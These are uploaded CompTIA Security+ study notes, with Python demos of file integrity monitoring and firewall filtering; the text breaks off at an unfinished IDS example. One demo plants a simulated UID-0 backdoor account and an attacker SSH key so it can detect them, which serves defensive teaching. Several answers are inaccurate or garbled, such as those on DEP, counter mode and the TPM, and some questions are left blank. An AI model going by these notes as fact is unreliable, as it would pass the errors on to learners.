CompTIA Security SY0-601

Uploaded by Ashley Allen

CompTIA Security+

SY0-601

What is phishing?
An email, for example, that tries to get you to click on a link and reveal sensitive information.

What is pretexting?
The attacker plays a character in a situation they create.
Lying to get information.

What is pharming?
Can be used when a DNS server is poisoned.
Everyone is redirected to a bogus site.
Pharming harvests large groups of people.

What is vishing?
Voice phishing.
Caller ID spoofing.

What is smishing?
Phishing over SMS to get information or make you click a link.

What is spear phishing?
A targeted phishing campaign.
Whaling is commonly targeted at the CFO (Chief Financial Officer).

What does eliciting information mean?
Extracting information from the victim. The victim doesn't realize it's happening.
Often done over voice.

What is identity fraud?
Your identity can be used by others: credit card fraud, bank fraud, loan fraud, government fraud.

What is dumpster diving?
Gathering information from garbage.

How to protect from dumpster diving?
Shred documents, lock the fence around the dumpster, or burn the documents (some companies do).

What is shoulder surfing?
Someone behind you can see sensitive information. (Works well at airports, coffee shops, etc.)
Preventing shoulder surfing - privacy filters, keep the monitor out of sight.

What are hoaxes?
A threat that doesn't actually exist - they seem like they could be real.
Still consume lots of resources.
Malware that pretends to be malicious and tries to get you to purchase something.

How can we identify spam to avoid it?

What is credential harvesting?
The attacker collects login credentials.
Credentials can be stored in Chrome, Windows Credential Manager, Outlook.

What is malware?
Malicious software that has a negative impact on the user.

Types of malware
Viruses
Crypto-malware
Ransomware
Worms
Trojan horses
Rootkits
Keyloggers
Adware
Botnets

How can you block worms?
Firewalls and IDS/IPS can mitigate.
We need the signature of that worm to put a restriction on the firewall between the 2 systems.

What is ransomware?
May be a fake ransom to get people to pay.

What is crypto-malware?
Malicious software that encrypts your data; the key to unlock it can be obtained by paying with bitcoin.

How to protect against ransomware?
Always have a backup.
Keep your operating system up to date.
Keep your applications up to date.
Keep your antivirus up to date.
Keep everything up to date.

What is a trojan horse?
Software that looks non-threatening to your system.
Can disable your antivirus, create backdoors.

What is a PUP?
Potentially unwanted program.

What are remote access trojans?
Remote administration tools.
Bad guys connect with the client software.
Control a device - keylogging, screen recording.

What is a rootkit?
Malicious software that modifies core system files - part of the kernel.

What is adware?
Pop-ups that advertise.
Installed accidentally, may be included with other software.
It's hard to remove.
May cause performance issues.

What is spyware?
Malicious software that tries to find personal information about you.
Checks visited sites, records keystrokes.

What is C&C?
The command and control server sends instructions to botnets on what to perform.
Used for DDoS attacks, relaying spam.

What is a logic bomb?
A type of attack that triggers when a separate event occurs.
Time bomb - at a certain time or date.
It's hard to identify.
For example, a trojan will install malware.

How to prevent against logic bombs?
Formal change control
Alert on changes
Host-based intrusion detection
Constant auditing

What is a hash?
A one-way cryptographic algorithm used to protect passwords.

What is a spraying attack?
Trying to log in with incorrect passwords will eventually lock you out.
We try the top 3 passwords (123456, 123456789, qwerty).

What is a brute force attack?
BF attacks try every possible password combination.

What is a dictionary attack?
To get passwords we use a dictionary to find common words - passwords created by humans.
Many common wordlists are available on the internet - for medicine, for example.

What are rainbow tables?
An optimized, pre-built set of hashes.
Saves time and storage space.
Contains pre-calculated hash chains.

What is a salt when we are talking about passwords?
A little bit of extra data used with the password when hashing. This protects passwords from rainbow tables, for example, because randomness was added.

Types of physical attacks
Malicious USB cable - a cable that acts as a HID (human interface device) - connected as a keyboard that will trigger a command line.
Malicious USB flash drive - the attacker can put malicious software in a PDF file or in spreadsheets as macros. Can act as a wireless adapter to access the internal network.

Skimming - stealing credit card information, usually during a normal transaction.
Later it's used for card cloning.

What can machine learning be used for?
Can prevent spam.
Attackers can try to poison the AI to reveal sensitive data or to get past the AI.

Supply chain attack
The attacker infects a supplier that has access to our internal network.
For example, a provider can have a VPN connection to our network; if they are compromised, the attacker gets past the firewall and is already inside our system.

What is a birthday attack?
The chance that 23 people share a birthday is 50%, 30 people 70%, 70 people 99.9%.
In the digital world, this is a hash collision - hashes are supposed to be unique; the attacker generates multiple versions of plaintext to match the hashes.

What is a downgrade attack?
Instead of using good encryption, something not so secure is negotiated instead.
We force the communication to a lower level of security that can be taken advantage of.
Forcing clients to fall back to SSL 3.0.

What is privilege escalation?
A user getting root or administrative privileges on the machine to gain full access.

How can we prevent privilege escalation?
Updated anti-virus, anti-malware software
Data execution prevention - only data in executable areas can run
Address space layout randomization - prevents a buffer overrun at a known memory address

Types of cross site scripting
Non-persistent XSS attack - the web site allows scripts to run in user input. The attacker emails a link that takes advantage of this vulnerability. The user has to click the specific link to reveal some information.

Persistent (stored) XSS attack - includes a malicious payload (everyone gets the payload).

What is a code injection attack and what are the types?
Adding your own information into a data stream.
Enabled because of bad programming.

SQL injection modifies a SQL query to reveal information.

LDAP stores passwords and authentication information.

XML - set of rules for data transfer and storage.

DLL (Windows library containing code and data) - runs as part of the target process - another application will run the program and therefore we get information that normally we wouldn't have.

What is a buffer overflow?
One section of memory is able to overwrite another section of memory.
The letter E spills into process B and changes the hex string in a variable. This can allow crashes or some privilege escalation.


What is replay attack?


Usefull information is transmitted over the network
Attacker will install network tap, arp poisoning, malware on victim to get the
data stream redirected
Gathered information can be used later to look like the client

What is session hijacking?


Attacker gains session ID to act like the client on the network

How can you protect form session hijacking?


By enrypting end to end channel - use HTTPS and force TLS

What is cross site request forgery?


Takes advantage of the trust that a web application has for the user
What is server side request forgery?
Attacker finds a vulnerable web application

What is shimming?
Allows backwards compatibility with previous version
Filling the space between two objects

What is refactoring?
Metamorphic malware - when malware is dowloaded each time it's unique.
Malware auther will add additional code - loops, pointless code strings to make
that signiture won't match

What is SSL stripping?


What is race condition?
A programming flaw, when multiple things happened at the same time and you
are not expecting it.

What is memory leak?


Unused memory is not properly released
Begins to slowly grow in size and eventually uses all availabe memory
System crashes

What is a null pointer dereference?
A programming technique that references a portion of memory which is empty.
This will cause the application to crash.

What is directory traversal?
Allows reading files from a web server that are outside of the website's file directory.
Won't stop users from browsing past the web server root - takes advantage of badly written code.

What is resource exhaustion?
A specialized DoS attack - the device will use all the resources - bandwidth, or DHCP starvation.

What are rogue access points?
An unauthorized wireless access point.
An employee or an attacker adds it to our network.
Potential backdoor.

How to protect from rogue access points?
Auditing.
Consider using 802.1X network access control - you must authenticate, regardless of the connection type.

What is a wireless evil twin?
Looks like a legitimate AP - using the same SSID and security settings.
Can be used to spoof the correct AP to get the data from the air.

What is bluejacking?
Sending unsolicited messages to another device via Bluetooth.

What is bluesnarfing?
Accessing a Bluetooth-enabled device and transferring data.

How to protect against deauth attacks?
Important management frames are encrypted since 802.11w, implemented as part of 802.11ac compliance.

What is RFID?
Radio frequency identification.
It's used for access badges, animal identification, anything that needs to be tracked.

What is NFC?
Near field communication.
Used for payment systems.

What is a nonce?
An arbitrary number that is used once in cryptography to add some randomness.

What is typically used as a cryptographic nonce?
Initialization vector.

What is an on-path network attack?
Formerly known as a man in the middle attack.
The original data stream is intercepted and redirected to be modified.
Can even be malware in your browser that waits for you to log in to your bank account.

How many bits has a MAC address?
48 bits / 6 bytes long.

What is MAC flooding?
The attacker sends various requests with different MAC addresses.
The switch fills up its MAC table and instead sends all traffic to all interfaces.

What is MAC spoofing?
The attacker changes their MAC address to match the MAC of an existing device.
Used to disrupt communication.

How can a DNS server be poisoned?
Modify the DNS server
Modify the client hosts file
Send a fake response to a valid DNS request

What is URL hijacking?
A URL that is badly spelled - used to redirect to a competitor, advertising, phishing or to sell such a domain.

Domain reputation
Suspicious activity from email does matter - a bad reputation can cause email delivery to fail.
Sites that are infected with malware won't be indexed.

What is denial of service?
Overloading the service so it is not available.

What can cause DoS?
Denial of service can be unintentional:
Layer 2 loop without STP
Bandwidth DoS - downloading too much
The water line breaks in the ceiling

What is DDoS amplification?
Turn your small attack into a big attack.
An increasingly common network DDoS technique that sends a little bit of data that gets a huge packet back in reply. We can use a DNS resolver to forward the query.

What is operational technology?
Hardware and software for industrial equipment.
Electric grids, traffic control, manufacturing plants, etc.

What are the options for scripting in cybersecurity?
Windows PowerShell - .ps1 file extension, used on Windows to access files.

Python - .py file extension, popular in cloud, routers, switches, servers.

Shell script - .sh file extension, scripting environment for Linux.

Macros - used to make an application easier to use.

Visual Basic for Applications (VBA) - macros and automation in Microsoft Office; can talk directly to the operating system.

Types of threat actors
Insiders - doesn't have to be a hacker, but has access to sensitive data.

Nation states - have security experts, commonly behind APTs - advanced persistent threats.

Hacktivist - a hacker with a purpose - political or social message.

Script kiddies - use a lot of scripts without knowing how they work and try to gain access with one of them.

Organized crime - professional criminals motivated by financial gain.

Hackers - often driven by money, power and ego.

Shadow IT - working around the internal IT organization. People going rogue.

Types of attack vectors
An attack vector is a method to gain access.
Direct access
Wireless attack
Email attack
Supply chain attack
Social media attack
Removable media attack
Cloud attack

What is threat intelligence?
Researching threats and making decisions based on the gathered intelligence.

What is OSINT?
Open source intelligence - publicly available sources, internet, government data.

What is threat intelligence and where to get it?
Researching threats and making decisions based on it to prevent attacks.

OSINT - open source (internet, government data, commercial data)
Vulnerability databases - CVE
Closed intelligence for private companies
Dark web

What is AIS?
Automated indicator sharing - intelligence shared freely in the standard format STIX; to securely transfer it we use TAXII.

What is an IOC?
Indicator of compromise - to detect that we have been breached.
Unusual amount of network activity
Change to file hash values
Irregular international traffic
Changes to DNS data
Uncommon login patterns
Spikes of read requests to certain files

What is CVE?
Common Vulnerabilities and Exposures database.

Where to look for new threats?
Vendor websites
Vulnerability feeds
Conferences
Academic journals
Local industry groups
Social media

What is TTP?
Tactics, techniques and procedures - the signature marks of the attacker - these might change based on what they are attacking.

Vulnerability types
Zero-day attacks
Open permissions
Unsecured root accounts
Errors
Weak encryption
Insecure protocols
Default settings
Open ports and services
Improper patch management
Legacy platforms

What can be a 3rd party risk?
Lack of vendor support - late patches
Supply chain attack
Access via VPN
Physical access at data storage

What is the vulnerability impact on business?
Data loss - deleted data
Identity theft
Financial loss
Reputation impact
Availability loss

What is threat hunting?
The constant game of cat and mouse. Find the attacker before they find you.
Strategies are constantly changing.

Types of scans
Non-intrusive scans
Intrusive scans
Non-credentialed scans
Credentialed scans

What is SOAR?
Security orchestration, automation and response.
Automates routine, tedious and time-intensive activities.

What is penetration testing?
Simulating an attack to exploit vulnerabilities to gain access.

What is passive footprinting?
Learn as much as you can from open sources about the organization.
Social media, corporate web site, online forums - reddit, social engineering, dumpster diving.

What is wardriving or warflying?
Combine WiFi monitoring and a GPS - search from your car, plane, drone.

What is active footprinting?
Trying the doors.
Visible in network traffic and logs.
Ping scans, port scans
DNS queries
OS scans, OS fingerprinting

What is a red team?
Offensive security team
Ethical hacking
Exploit vulnerabilities
Social engineering
Web application scanning

What is a blue team?
Defensive security
Operational security
Incident response
Threat hunting
Digital forensics

What is a purple team?
Red and blue team working together.

What is a white team?
Not on a side - manages the interactions between red teams and blue teams.
Enforces the rules, resolves any issues, determines the score.

What is part of configuration management?
Network diagram
Baseline configuration
Standard naming conventions - asset tag, location, serial number
IP schema - subnets based on locations

What is obfuscation?
Hiding some of the original data.

What is diffusion?
In cryptography, changing one character of the input results in changing many characters of the output.

What is data at-rest?
The data is on a storage device.
We can encrypt it or apply permissions on folders or files.

How to secure data in-transit?
Firewall, IPS, provide TLS or IPsec to encrypt it.

What is tokenization?

What are the data loss prevention options against an attacker?
USB blocking
We can check for data strings in data flows - cloud
We can check inbound and outbound emails - block, quarantine

What is SSL/TLS inspection?
The browser contains a list of trusted CAs.
We assign an internal CA certificate to our firewall or SSL decryption device.

What does hashing provide?
Integrity.

What are honeypots?
A virtual world for the attacker to exploit, so we learn about their techniques.

What is a DNS sinkhole?
A DNS server that hands out incorrect IP addresses.
An attacker can redirect you to an incorrect service.
We can configure it so that if a malware-infected machine tries to access a specific site, we redirect it and notify the responsible people.

What is IaaS?
Infrastructure as a service.
We are provided with hardware - we need to secure the data.

What is SaaS?
Software as a service.
We need to configure the application.
Central management of data.
Google mail is SaaS.

What is PaaS?
Platform as a service.
You are given a platform to develop your own application.

What is an MSP?
Managed service provider.
Not all cloud service providers are MSPs.
MSPs support network connectivity management, backups and disaster recovery, growth management and planning.

Cloud deployment models
Public - everyone on the internet can access them
Community - several organizations share the same resources
Private - your own virtualized local data center
Hybrid - a mix of public and private

What is cloud computing?
Computing on-demand = instantly available computing power.
Fast implementations, smaller costs.
Can have disadvantages: latency, bandwidth, difficult to protect data, requires an internet connection.

What is edge computing?
Devices with very specific functions - IoT.
Huge amount of data.
No latency - process data on the device itself.

What is fog computing?
A cloud that's close to your data.
Cloud + Internet of Things.
Some of the data is taken to the cloud to analyze. Sensitive data stays on the local network.

What is a thin client?
Applications run on a remote server.
We don't need good hardware.

What is virtualization?
Enables running many different operating systems on the same hardware.

What are containers good for?
We have one instance of the operating system and each application is in its own sandbox.
Applications are self-contained.

What is a monolithic application?
One big application that does everything.
Contains all decision-making processes.

What is microservice architecture?
APIs manage communication.
Adding a new service is easy.

What is FaaS?
Function as a Service.
Applications are separated into individual autonomous functions.

What is a virtual private cloud?
A pool of resources created in a public cloud, provided by a transit gateway, that hosts can access via VPN.

What is service integration and management?
Many different service providers - we are multisourcing in the cloud.
Provides a centralized view to manage resources in the cloud in a multivendor environment.

Infrastructure as code
Describes an infrastructure.
Define servers, network and applications as code.
Ability to easily deploy application instances which have specific and identical settings.

What is VM sprawl?
Virtual machines are everywhere because they are not removed. We need a formal process to deprovision them.

What is VM escape?
Breaking out of a VM to interact with the host's operating system and move between other VMs.

What is sandboxing?
Isolated testing environment.

Stages of building the application?
Development - secure environment, writing code, developers test in their sandbox.

Test - we are testing if the application is working as expected.

Quality assurance - verifies features are working as expected, verifies old errors don't reappear.

Staging - testing the application in a real-like environment. Production data is copied, for example, and we test performance.

Production - we deploy the application.

What is scalability?
The ability to increase the workload in a given infrastructure.

What is elasticity?
Increase or decrease available resources as the workload changes.

What is orchestration?
Automation in cloud computing - will deploy servers, networks, switches, firewalls = instantly provisioned.

What are stored procedures?
When we are requesting data from a SQL database, the query can be modified. Stored procedures limit the client interactions, and modifications to the query are not possible.

What is input validation?
We need to make sure that data is correct to prevent the user from performing changes.
We can have server-side or client-side.

What are directory services?
Keep all of an organization's usernames and passwords in a single database.
All authentication requests reference this directory.
Access via Kerberos or LDAP.

What is federation?
Provide network access to others.
Third parties can establish a federated network (Facebook, Google, Twitter).

What is attestation?
Prove the hardware is really yours - a system you can trust.
Example: Verizon laptops.

What is a push notification?
The authentication factor is pushed to a specialized app - usually on a mobile device.

What can be a biometric factor?
Fingerprint scanner, retinal scanner, iris scanner, voice recognition, facial recognition.
Gait analysis - how you walk, veins.

What do we need to make sure of when we are using biometrics?
To make sure we have a proper balance between false acceptance rate and false rejection rate.

What is the AAA framework?
Authentication, authorization and accounting.

Types of authentication
Something you know - passwords, PIN, pattern
Something you have - smart card, USB token, hardware or software tokens, phone
Something you are - biometrics
Somewhere you are - based on location / IP address
Something you can do - handwriting

What is redundancy and how to provide it?
Duplicate parts of the system - if a part fails the redundant part can be used.
Use geographic dispersal.
Disk redundancy - multipath fibre connection, RAID - redundant drives.

Types of RAID
RAID 0 - no fault tolerance
RAID 1 - mirroring - duplicates the data - requires twice the space
RAID 5 - striping with parity = fault tolerant, only requires one additional disk for redundancy

What is a UPS?
Uninterruptible power supply.
Short-term backup power - uses batteries.

Power redundancy options
UPS, generators, dual power supplies, power distribution units (PDUs) - connect to multiple devices and we can control them via Ethernet.

Types of data backups
Full - is taken first
Incremental - all files changed since the last incremental backup
Differential - all files changed since the last full backup

What is continuous delivery with regards to applications?
Automate the testing and release process. One button to deploy the application.

What is a SAN?
Specialized high-performance network of storage devices.

What is an embedded system?
Hardware and software designed for a specific function.

What is a system on a chip?
Multiple components running on a single chip - Raspberry Pi.

What is a field-programmable gate array?
An integrated circuit that can be configured after manufacturing.
Common in firewall logic and routers.

What is HVAC?
Heating, ventilation and air conditioning system.

How can embedded systems communicate?
Zigbee - uses a mesh network
5G
SIM
Narrowband - used over a longer distance - conserves frequency. Oil fields.
Baseband - using a single frequency to communicate - fiber.

What are some constraints of embedded systems?
Power, compute power, upgradability limitations, network connection, limited cryptographic features - hardware options, inability to patch, specific function with low cost.

What can be physical security controls?
Barricades / bollards
Access control vestibules - all doors normally locked / unlocking one door prevents the others from being opened
Alarms - circuit based, motion detection
Signs, proper lighting, fencing, fire suppression, sensors, drones
Video surveillance, Faraday cage, DMZ zone
Industrial camouflage - facility doesn't look like a data center
Security guard - ID badges
Biometrics
Door access controls - lock and key, electronic - PIN
Cable locks

What is an air gap?
Most environments are shared - switches, routers, firewall.
An air gap is physical disconnection from the network.
Stock market, power systems, airplanes, nuclear power plant operations.

What are hot and cold aisles?
In data centers we use this method to optimize cooling.

What is data purging?
Removing data from an existing data store.
Delete some of the data from a database.

What is plaintext?
An unencrypted message.

What is ciphertext?
An encrypted message.

What is a cipher?
The algorithm used to encrypt and/or decrypt ciphertext.

What is homomorphic encryption?
We are able to perform calculations on data in encrypted form.

Difference between symmetric and asymmetric encryption?
Symmetric uses a single key.
Asymmetric uses 2 keys - private and public.

How does asymmetric encryption work?

How can we get a symmetric key from asymmetric keys?

What is elliptic curve cryptography?
Instead of numbers we use curves in cryptography.
Smaller keys
Smaller storage
Perfect for mobile devices

What is a digital signature and how does it work?
Proves the message was not changed.

What is perfect forward secrecy?
Every session uses a different private key for the exchange.
The session keys are not kept around.

What is steganography?
Security through obscurity = the message is not visible to the human eye but it's there.
Graphics such as photos.
Embed messages in TCP packets, invisible watermarks, image, audio, video.

What is a stream cipher?
Encryption is done one bit or byte at a time.
High speed, low hardware complexity.
It's used with symmetric encryption.
The starting state should never be the same twice - we use an initialization vector (IV).

What are block ciphers?
Encrypt fixed-length groups - often 64 bits or 128 bits.
Symmetric encryption.
We use different modes of operation.

How does electronic codebook work?
ECB - Electronic Codebook = each block is encrypted with the same key.
Identical plaintext blocks create identical ciphertext blocks.

How does cipher block chaining work?
CBC = mode of operation to encrypt blocks of data.
Popular as it is easy to implement.
Each block is XORed with the previous ciphertext block.
Adds additional randomization.
Uses an initialization vector for the first block.

What is counter mode in encryption?
One of the modes to encrypt blocks of data.
Uses an incrementing counter for randomness.
Provides encryption with authentication.
The most common is GCM - Galois/Counter Mode.

Modes to encrypt blocks of data
ECB - Electronic codebook
CBC - Cipher block chaining
Counter mode

What is blockchain?
A distributed ledger - everyone on the blockchain network maintains the ledger.
Records and replicates to anyone and everyone.
Used in payments, digital identification, supply chain monitoring.

Limitations of cryptography
Easily guessed passwords without a salt
Speed - a system needs CPU and power
Size - can potentially increase the storage size
Weak keys - can be brute-forced
Time - large files can take a lot of time - asymmetric is slower than symmetric
Key reuse - reusing the same key reduces complexity

What do we use to have secure voice or video across the network?
SRTP - secure real-time transport protocol.
Uses AES to encrypt the voice/video flow.

What protocol do we use for email?
S/MIME - secure multipurpose internet mail extensions.
Requires public and private key.
POP3 with SSL or IMAP with SSL.

What protocol is used for secure internet browsing?
SSL/TLS or HTTPS.

What 2 protocols does IPsec use?
Authentication header = AH
Encapsulating security payload = ESP

What protocol is used for secure file transfer?
FTPS or SFTP.
FTPS uses SSL to provide encryption.
SFTP uses SSH and provides management functionality.

What protocol is used for reading and writing directories over an IP network?
LDAP
LDAPS - uses SSL - a non-standard implementation
SASL - Simple authentication and security layer - uses Kerberos or client certificate

What protocol is used for remote access?
SSH

What can provide endpoint protection?
Anti-virus and anti-malware - looks for signatures.

Endpoint detection and response - EDR - we are checking behavioral analysis, machine learning, process monitoring. Can respond to the threat.

Data loss prevention - DLP = we check strings in cloud, email, on the host for sensitive data and block the transfer.

Next generation firewall - deep packet inspection - can see what application is used.

Host-based firewall - allows or disallows incoming or outgoing application traffic. Identifies unknown processes and blocks them before they are executed.

Host-based intrusion detection system - it's built into endpoint protection software. Checks for signatures, heuristics, behavioral changes, writing files to folders.

What is a trusted platform module?
Hardware to help with encryption functions.
Has versatile memory to store keys, hardware configuration information.
Comes with unique keys burned in during production.

What can provide software secure boot?
UEFI BIOS secure boot.
Has the manufacturer's public key - to check if an update is really coming from the manufacturer.
Makes sure that the bootloader was signed by a trusted certificate.

What is trusted boot?
The bootloader verifies the digital signature of the OS kernel.
The kernel verifies that the operating system wasn't modified, then checks boot drivers and startup files.

What is remote attestation and how does it work?
The device provides an operational report to a verification server.
UEFI stores a hash of the firmware, boot drivers and everything else loaded during the secure boot and trusted boot process.
Everything is encrypted, signed and sent to the TPM / attestation server, which checks if it matches.

What is fuzzing?
The attacker sends random input to an application to find faults.

Different types of load balancing in a network
Round robin
Weighted round-robin
Dynamic round-robin
Active/active load balancing

What is affinity?
Many applications require communication to the same instance.
- each user is "stuck" to the same server
- tracked through IP address or session IDs

What is network segmentation?
We can segment physically, logically or we can have virtual segmentation.
Physical - air gap
Logical - VLANs
Virtual segmentation - DMZ

What is east-west traffic?
Traffic flows within a data center.

What is an ephemeral key?
Keys that are not permanent.

What is quantum computing?
We have qubits - which are not zero or 1, as they are zero and 1 at the same time.
Will allow us to search quickly through large databases at the same time.

What is the new way of encryption: post-quantum cryptography
NTRU - cryptosystem using lattice theory.
Quantum network - sending a random stream of qubits across the network. Both sides verify and agree on the transferred keys; if someone listens, it will change the key as it disrupts the quantum channel.

What kind of cryptography do we use with a limited amount of resources? (Low power devices)
Symmetric encryption or elliptic curve cryptography.

What is non-repudiation?
We can confirm that the data comes from the sender - we use a digital signature.
Non-repudiation is the ability to verify that a message has been sent and received so that the sender (or receiver) cannot refute sending (or receiving) the information.

What are some application security techniques?

Input validation
Error and exception handling
Secure cookies (Secure, HttpOnly and SameSite flags)
HTTP secure headers (Content-Security-Policy, Strict-Transport-Security)
Code signing - a trusted CA issues the developer a code-signing certificate;
the developer signs their code with the matching private key
Allow or deny lists to restrict which applications can run or which folders
they may access
Static code analyzers - check for vulnerabilities in source code

What is application hardening?

Minimize the possible entry points
Close unused open ports and services
Lock down registry configuration on Windows
Disk encryption
Keep the operating system up to date

What does the encryption/decryption in a VPN?

The VPN concentrator

Types of VPN connections

Full tunnel - all traffic goes through the VPN concentrator
Split tunnel - only corporate traffic goes through the tunnel; other traffic
goes straight out to the internet
Site-to-site - 2 concentrators encrypt and decrypt between 2 sites (L2TP over
IPSec makes the sites behave as if they were on the same network)

2 ways of sending encrypted data over an IPSec tunnel
Transport mode - only the payload is protected; the IP header is in the clear
Tunnel mode - the whole original packet is protected and a new IP header is
added

What doesn't AH provide?

Encryption. It provides integrity and data-origin authentication

What provides encryption inside an IPSec tunnel?

ESP

What does PortFast do?

It bypasses the spanning tree listening and learning states so an end-station
port starts forwarding immediately

What does BPDU guard do?

When we are using PortFast we don't want a switch connected to that port, so we
configure BPDU guard as well: if a BPDU arrives on the port (meaning a switch
was plugged in), the interface is shut down (err-disabled)

What is DHCP snooping?

The switch is configured with trusted ports (towards routers, other switches
and the DHCP server). DHCP server responses arriving on an untrusted port are
filtered out, and the switch builds a binding table of IP/MAC/port.
What is FIM?
File integrity monitoring - some files change all the time and some should
never change
Linux - Tripwire
Windows - SFC (System File Checker)
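A minimal file integrity monitor, as an added example in Python (not from the original notes and not Tripwire's or SFC's own code). It hashes every regular file under a directory into a baseline, then reports files that were added, removed or modified. The "system files" and the attacker's changes are constructed in a temporary directory so it runs anywhere; a real deployment would store the baseline off-host, because an attacker with root can otherwise rewrite it.

```python
"""File integrity monitoring in miniature. Added example; sample files are
constructed in a temp dir."""
import hashlib
import json
import os
import tempfile


def hash_file(path, chunk=65536):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(root):
    """Map relative path -> SHA-256 digest for every regular file under root."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue  # a link's target is hashed under its own path
            result[os.path.relpath(full, root)] = hash_file(full)
    return result


def diff(baseline, current):
    """Classify every change; a modified file is the alert that matters most."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline.keys() & current.keys()
                           if baseline[p] != current[p]),
    }


def demo():
    with tempfile.TemporaryDirectory() as root:
        etc = os.path.join(root, "etc")
        os.makedirs(etc)
        # Constructed "system files".
        with open(os.path.join(etc, "passwd"), "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash\n")
        with open(os.path.join(etc, "hosts"), "w") as f:
            f.write("127.0.0.1 localhost\n")
        baseline = snapshot(root)
        stored = json.dumps(baseline, sort_keys=True)  # what you would keep off-host

        # Simulated intrusion: a UID-0 backdoor account and a dropped SSH key.
        with open(os.path.join(etc, "passwd"), "a") as f:
            f.write("backdoor:x:0:0::/root:/bin/bash\n")
        os.makedirs(os.path.join(root, "root", ".ssh"))
        with open(os.path.join(root, "root", ".ssh", "authorized_keys"), "w") as f:
            f.write("ssh-ed25519 AAAA... attacker\n")

        return diff(json.loads(stored), snapshot(root))


if __name__ == "__main__":
    print(demo())
```

Hashing catches content changes but not permission or ownership changes; production tools also record mode, owner and mtime from stat() and alert on those.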

What can a firewall provide?

Filter traffic by port number or, on a next-generation firewall, by application
Encrypt traffic - VPN between sites
It is usually a layer 3 device that sits between the ingress and egress networks
Can provide NAT and user authentication

What is the difference between a stateless firewall and a stateful firewall?

Stateless firewall - doesn't keep track of traffic flows; each packet is
examined individually. It can't tell that the response from a web server
belongs to an earlier request, so communication must be allowed explicitly in
both directions, which also lets in unsolicited packets that match.

Stateful firewall - everything within a valid flow is allowed. It remembers
that the session was requested and therefore allows the reply traffic the other
way. It keeps a session table.
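The two filtering models side by side, as an added example in Python (not from the original notes and not any firewall's code). The packets are constructed 5-tuples; the stateless filter judges each packet alone and so needs an inbound rule that also admits an unsolicited probe with the same source port, while the stateful filter admits only the reverse of a session it recorded.

```python
"""Stateless vs stateful packet filtering. Added example; packets and the
policy are constructed."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    direction: str  # "out" (LAN -> internet) or "in"


# Policy: LAN clients may reach HTTPS servers. Nothing else is listed.
OUTBOUND_RULES = [("10.0.0.0/8", "any", 443)]


def in_subnet(ip, cidr):
    net, bits = cidr.split("/")
    mask = (0xFFFFFFFF << (32 - int(bits))) & 0xFFFFFFFF
    to_int = lambda a: int.from_bytes(bytes(int(x) for x in a.split(".")), "big")
    return to_int(ip) & mask == to_int(net) & mask


def rule_allows(pkt, rules):
    return any(in_subnet(pkt.src, src) and (dst == "any" or pkt.dst == dst)
               and pkt.dport == port for src, dst, port in rules)


def stateless_filter(pkt, allow_in_from_sport=()):
    """Each packet judged alone. Replies pass only through an explicit inbound
    rule, and that rule cannot distinguish a reply from a crafted probe."""
    if pkt.direction == "out":
        return rule_allows(pkt, OUTBOUND_RULES)
    return pkt.sport in allow_in_from_sport


class StatefulFilter:
    def __init__(self):
        self.sessions = set()

    def filter(self, pkt):
        if pkt.direction == "out":
            if rule_allows(pkt, OUTBOUND_RULES):
                self.sessions.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
                return True
            return False
        # Inbound: allowed only if it is the exact reverse of a recorded session.
        return (pkt.dst, pkt.dport, pkt.src, pkt.sport) in self.sessions


def demo():
    request = Packet("10.0.1.5", 51000, "93.184.216.34", 443, "out")
    reply = Packet("93.184.216.34", 443, "10.0.1.5", 51000, "in")
    # Unsolicited probe dressed up as a reply: source port 443, no session.
    probe = Packet("198.51.100.9", 443, "10.0.1.5", 51000, "in")

    stateless = {
        "request": stateless_filter(request),
        "reply": stateless_filter(reply),
        "reply_with_rule": stateless_filter(reply, allow_in_from_sport=[443]),
        "probe_with_rule": stateless_filter(probe, allow_in_from_sport=[443]),
    }
    fw = StatefulFilter()
    stateful = {"request": fw.filter(request), "reply": fw.filter(reply),
                "probe": fw.filter(probe)}
    return stateless, stateful


if __name__ == "__main__":
    print(demo())
```

The classic stateless hole is exactly "probe_with_rule": an "allow inbound from source port 443" rule lets an attacker scan the LAN by setting their source port to 443. A real stateful firewall also ages entries out and, for TCP, tracks the handshake and sequence numbers rather than only the 5-tuple.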

What is UTM and what does it provide?

Unified Threat Management
Provides:
URL filter, malware inspection, spam filter, firewall, IDS/IPS, VPN endpoint,
router/switch, bandwidth shaper

What is a web application firewall?

Applies rules to HTTP and HTTPS traffic
Allows or denies based on expected input - protects against SQL injection and
similar injection attacks
What is the difference between edge and access control?
Edge - managed primarily through firewall rules at the network perimeter that
rarely change
Access control - based on many rules; can control communication inside or
outside the network and can change with the user, device and location

What is posture assessment?

Before a device (including a personal one) connects to the corporate network,
we check its state: is antivirus running and up to date, is the OS patched,
are the required applications present, etc.

How can we implement posture assessment?

Persistent agents - permanently installed on the system
Dissolvable agents - no installation required; runs once and terminates when
no longer required
Agentless NAC - integrated with Active Directory. Checks are made during login
and logoff. Can't be scheduled.

What is a forward proxy?

Commonly used to protect and control user access to the internet
Forwards traffic on behalf of the user, checks that the response is safe and
passes it back

What is a reverse proxy?

Handles inbound traffic from the internet to your internal service

What is an open proxy?

A third-party proxy that you do not control
Can be a significant security concern as it circumvents existing security
controls.

What is passive monitoring on the network?

A copy of the traffic (SPAN/mirror port or network tap) is sent to the sensor.
We collect data but can't block traffic in real time.
What is out-of-band response?
A copy of the traffic is sent to the IPS. If it detects a malicious flow it
can't stop the packets it has already seen, but it can send a TCP reset to tear
the session down and block the traffic that follows.

What is inline monitoring?

The IPS sits in the traffic path, for example between the router and the
switch. It can block malicious traffic in real time so it never reaches the
destination.

What are identification technologies for threats?

Signature-based - looks for an exact match with a known pattern
Anomaly-based - builds a baseline of what is normal and alerts on deviations
Behavior-based - observes what a process does and reports dangerous actions
Heuristics - uses AI/machine learning to judge activity it hasn't seen before
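Signature-based and anomaly-based detection run over the same log, as an added example in Python (not from the original notes and not any IDS product's rules). The sshd-style log lines and the quiet-week baseline are constructed. The signature engine matches known-bad patterns with regular expressions; the anomaly engine counts failed logins per source and flags any source beyond the baseline mean plus three standard deviations.

```python
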